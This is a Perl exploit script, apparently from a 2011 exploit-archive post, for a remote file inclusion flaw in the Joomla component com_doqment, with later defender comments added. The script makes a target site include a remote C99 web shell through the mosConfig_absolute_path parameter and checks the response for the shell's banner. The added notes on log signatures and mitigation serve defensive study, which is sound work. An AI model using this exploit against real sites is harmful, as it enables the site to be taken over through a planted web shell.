[D] Joomla Component com_doqment Remote File Inclusion Vulnerability [z] 2011-02-03 15:15:37
Inviato da: kedans

#!/usr/bin/perl
# Name : [D] Joomla Component com_doqment Remote File Inclusion Vulnerability [z]
#------------------------------------------
# Detecting Date : 21/11/2010
# Developed Perl Date : [HST2011]
# Type : php , perl
# Exp : Upload shell C99.php
#-------------------------------------------
# Author : KedAns-Dz < ked-h (at) hotmail (dot) com >
# Team : [D] HaCkerS-StreeT-Team [z]
# special thanks to : Mr.Dak007 (+) TOnyXED

#Start SyStem : /root/@/MS-Dos :=>
# Overview: interactive proof-of-concept for a remote file inclusion (RFI) in
# the Joomla component com_doqment. It reads two URLs from STDIN, sends a
# single GET request that carries the second URL after the text
# `mosConfig_absolute_path=`, and then looks for a web-shell banner in the
# response body.
#
# NOTE(review): the script has no `use strict` / `use warnings`; $host, $b,
# $res and $answer below are undeclared package globals ($b is also Perl's
# sort-comparator variable).
#
# Defender notes:
#   * Log signature: a GET for index.php whose raw query string contains
#     `option=com_doqment` and `mosConfig_absolute_path=` followed by an
#     absolute URL. Match on the raw query string (see the note at the URL
#     construction below), not on the User-Agent.
#   * Mitigation (component source is not shown here, so confirm against the
#     installed version): RFI through a request-supplied
#     mosConfig_absolute_path generally depends on PHP's register_globals and
#     remote-URL includes (allow_url_include / allow_url_fopen) being enabled;
#     keeping those off and removing or updating the component closes this
#     class of bug.

# Console cosmetics. `title`, `color` and `cls` are cmd.exe built-ins, so these
# three calls only do something on Windows; the return values are not checked.
system ("title By KedAns-Dz");
system ("color 1e");
system ("cls");
# Banner.
print " \n";
print "-:|==================================================|:-\n";
print "-:| [!] Joomla com_doqment RFI (Up->C99_shell.php) |:-\n";
print "-:| |:-\n";
print "-:| [!] Author: KedAns-Dz |:-\n";
print "-:| |:-\n";
print "-:| [!] Mail: ked-h(at)hotmail(dot)com |:-\n";
print "-:|==================================================|:-\n";
sleep (2);
print " \n";
# `use` runs at compile time, so the module is loaded before any of the output
# above regardless of where this line sits. HTTP::Request is used further down
# without its own `use`; it is available because LWP::UserAgent loads it.
use LWP::UserAgent;
# First prompt: base URL of the Joomla site (the example shows a trailing slash).
print "\n> Web Target: 'http://www.target.com/path/' : \n";
print " \n";
print "> ";
chomp(my $target=<STDIN>);
# Second prompt: URL of the remote file that the request will reference.
print "\n> root Shell : 'http://[my-space]/c99.php' : \n";
print " \n";
print "> ";
chomp(my $shell=<STDIN>);
# Both inputs are concatenated verbatim around a fixed string. Note for log and
# WAF rules: the second `?` is not a new query separator, so on the wire the
# text `admin.ponygallery.html.php?mosConfig_absolute_path=<URL>` is the value
# of the `cid` parameter. A rule keyed on a parsed parameter *named*
# mosConfig_absolute_path would not match this exact request; a raw
# query-string match would.
$host = $target."index.php?option=com_doqment&cid=admin.ponygallery.html.php?mosConfig_absolute_path=".$shell ;
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
# Fixed User-Agent string. It is set by the client, so treat it as a weak
# indicator at best.
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
# One GET request; LWP's default redirect handling applies.
$res = $b->request(HTTP::Request->new(GET=>$host));
# "Success" is decided only by this pattern appearing in the response body.
# The HTTP status is never inspected ($res->is_success is unused), so a
# transport error, a 404 and a non-matching page all fall into the else branch.
# A "failed" run of this script is therefore not evidence that a host is patched.
$answer = $res->content; if ($answer =~/!C99Shell v. !/){
print "[+] Exploit succeeded !! ...\n";
print "\n";
print "[+] Sh3ll Url : ";
print "\n";
# Prints the full request URL that was sent.
print "$host";
print "\n";
print "-::| By KedAns-Dz |::-\n";
print "\n";
print " [D] HaCkerS-StreeT-Team [Z] ";
print "\n";
print "Allaho Akbar\n";
print "\n";
}
# Reached for every outcome other than a banner match (see note above).
else{print "\n[-] Errur Exploit!...\n";
}
# --- END ! ---
# KedAns , Algeria - HMD -
# By KedAns-Dz
#------------------------------------------------------------------------------------------
# [D] HaCkerS-StreeT-Team [Z] > Algerians HaCkErs <
# -- [>>] KedAns-Dz * BadR0 * XoreR * Dr.Ride * Fox-Dz * Red1One[<<] --
# -- [>] IslamPard * NoR0 FouinY * Zaki.ENG * Hani NiN0 * MasSinh0u-Dz [<] --